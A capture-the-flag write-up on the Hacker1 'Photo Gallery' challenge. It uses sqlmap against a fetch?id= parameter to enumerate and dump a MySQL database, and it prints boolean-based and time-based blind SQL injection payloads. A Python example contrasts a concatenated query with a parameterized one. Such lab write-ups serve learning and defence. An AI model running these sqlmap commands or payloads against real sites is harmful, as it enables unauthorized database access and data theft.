Hacker1 CTF - Photo Gallery (Part 1)

Using some tools

It is a fair guess that a database is powering this web application. Remember that in Hacker1 CTF - Micro CMS v2 we performed some SQL injection by hand; this time, rather than hand-crafting the injections, we're going to enlist the help of some tools.

SQLMap

Given a URL, sqlmap can estimate how likely a parameter or path is to be injectable, determine which DBMS is most likely powering the application, and then probe that DBMS for more information.

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

After a single run of sqlmap -u http://{ctf}/fetch?id=1, sqlmap was able to determine that the application is most likely using MySQL >= 5.0.12 as its DBMS. From there we can have it enumerate more information about the database and its tables with sqlmap --columns http://{ctf}/fetch?id=1:

[20:04:16] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12
[20:04:16] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[20:04:16] [INFO] fetching current database
[20:04:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:04:16] [INFO] retrieved: level5
[20:04:50] [INFO] fetching tables for database: 'level5'
[20:04:50] [INFO] fetching number of tables for database 'level5'
[20:04:50] [INFO] retrieved: 2
[20:04:51] [INFO] retrieved: albums
[20:05:06] [INFO] retrieved: photos
[20:05:23] [INFO] fetching columns for table 'photos' in database 'level5'
[20:05:23] [INFO] retrieved: 4
[20:05:25] [INFO] retrieved: id
[20:05:29] [INFO] retrieved: int(11)
[20:05:48] [INFO] retrieved: title
[20:06:03] [INFO] retrieved: text
[20:06:20] [INFO] retrieved: filename
[20:06:45] [INFO] retrieved: text
[20:07:01] [INFO] retrieved: parent
[20:07:52] [INFO] retrieved: int(11)
[20:08:57] [INFO] fetching columns for table 'albums' in database 'level5'
[20:08:57] [INFO] retrieved: 2
[20:08:59] [INFO] retrieved: id
[20:09:06] [INFO] retrieved: int(11)
[20:09:32] [INFO] retrieved: title
[20:09:52] [INFO] retrieved: text
Database: level5
Table: photos
[4 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| filename | text    |
| id       | int(11) |
| parent   | int(11) |
| title    | text    |
+----------+---------+

Database: level5
Table: albums
[2 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| id     | int(11) |
| title  | text    |
+--------+---------+

Furthermore, we can have sqlmap dump the contents of those tables with sqlmap --dump -T photos http://{ctf}/fetch?id=1:

[21:45:49] [INFO] resuming back-end DBMS 'mysql'
[21:45:49] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1341=1341

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 2501 FROM (SELECT(SLEEP(5)))DySl)

[21:45:52] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12
[21:45:52] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[21:45:52] [INFO] fetching current database
[21:45:52] [INFO] resumed: level5
[21:45:52] [INFO] fetching columns for table 'photos' in database 'level5'
[21:45:52] [INFO] resumed: 4
[21:45:52] [INFO] resumed: id
[21:45:52] [INFO] resumed: title
[21:45:52] [INFO] resumed: filename
[21:45:52] [INFO] resumed: parent
[21:45:52] [INFO] fetching entries for table 'photos' in database 'level5'
[21:45:52] [INFO] fetching number of entries for table 'photos' in database 'level5'
[21:45:52] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:45:52] [INFO] retrieved: 3
[21:46:04] [INFO] retrieved: files/adorable.jpg
[21:47:01] [INFO] retrieved: 1
[21:47:03] [INFO] retrieved: 1
[21:47:05] [INFO] retrieved: Utterly adorable
[21:47:52] [INFO] retrieved: files/purrfect.jpg
[21:48:49] [INFO] retrieved: 2
[21:48:52] [INFO] retrieved: 1
[21:48:54] [INFO] retrieved: Purrfect
[21:49:18] [INFO] retrieved: {flag1}
[21:53:21] [INFO] retrieved: 3
[21:53:26] [INFO] retrieved: 1
[21:53:30] [INFO] retrieved: Invisible

Database: level5
Table: photos
[3 entries]
+----+------------------+--------+--------------------+
| id | title            | parent | filename           |
+----+------------------+--------+--------------------+
| 1  | Utterly adorable | 1      | files/adorable.jpg |
| 2  | Purrfect         | 1      | files/purrfect.jpg |
| 3  | Invisible        | 1      | {flag1}            |
+----+------------------+--------+--------------------+

Awesome. Using sqlmap gained us FLAG1, and along the way we learned quite a bit about the app's database schema.
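The injection points sqlmap resumed above show what its boolean-based blind test relies on: appending a true condition (AND 1341=1341) to the id parameter leaves the response unchanged, while a false one changes it. The following added example (not code from the CTF or from sqlmap) reproduces that signal against a constructed in-memory copy of the photos table, with a concatenated query beside a parameterized one; the table contents mirror the dump above except that the flag value is a placeholder.

```python
import sqlite3


def make_db():
    # Constructed stand-in for level5.photos (assumption: the CTF's real
    # query and backend are not shown on the page; this is an illustration).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE photos (id INTEGER, title TEXT, parent INTEGER, filename TEXT)")
    db.executemany("INSERT INTO photos VALUES (?, ?, ?, ?)", [
        (1, "Utterly adorable", 1, "files/adorable.jpg"),
        (2, "Purrfect", 1, "files/purrfect.jpg"),
        (3, "Invisible", 1, "{flag1}"),  # placeholder, not the real flag
    ])
    return db


def fetch_vulnerable(db, photo_id):
    # The raw parameter is spliced into the SQL text, so any condition
    # appended to it is evaluated by the database as part of the WHERE clause.
    sql = "SELECT filename FROM photos WHERE id=" + photo_id
    return [row[0] for row in db.execute(sql)]


def fetch_parameterized(db, photo_id):
    # The parameter is bound as a value: "1 AND 1341=1341" is just a string
    # that equals no integer id, so the appended condition is never evaluated.
    sql = "SELECT filename FROM photos WHERE id=?"
    return [row[0] for row in db.execute(sql, (photo_id,))]


def boolean_blind_signal(fetch, db):
    """True when a true condition leaves the response identical to the baseline
    and a false condition changes it; that response difference is what the
    boolean-based blind test in the sqlmap output above keys on."""
    baseline = fetch(db, "1")
    true_case = fetch(db, "1 AND 1341=1341")
    false_case = fetch(db, "1 AND 1341=1342")
    return true_case == baseline and false_case != baseline


if __name__ == "__main__":
    db = make_db()
    print("concatenated query injectable:", boolean_blind_signal(fetch_vulnerable, db))
    print("parameterized query injectable:", boolean_blind_signal(fetch_parameterized, db))
```

SQLite has no SLEEP(), so the time-based variant from the sqlmap output is not reproduced here; the boolean signal alone is enough to show why binding the parameter removes the injection point.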

Let's go ahead and look at the contents of the albums table with sqlmap --dump -T albums http://{ctf}/fetch?id=1:

Database: level5
Table: albums
[1 entry]
+----+---------+
| id | title   |
+----+---------+
| 1  | Kittens |
+----+---------+

Hmmm, OK, I admit I'm stumped here. The hint mentions something suspicious about calculating the size of an album, which might refer to the bottom of the page, where it says:

Space used: 0 total

How might the page be calculating that number, and why would it come up with a result of 0? Zero what? Bytes? Entries? Either way zero is the wrong answer. Are there other databases besides the one named level5?

Alright, well, this is already a fairly long post; let's follow up in a Part 2.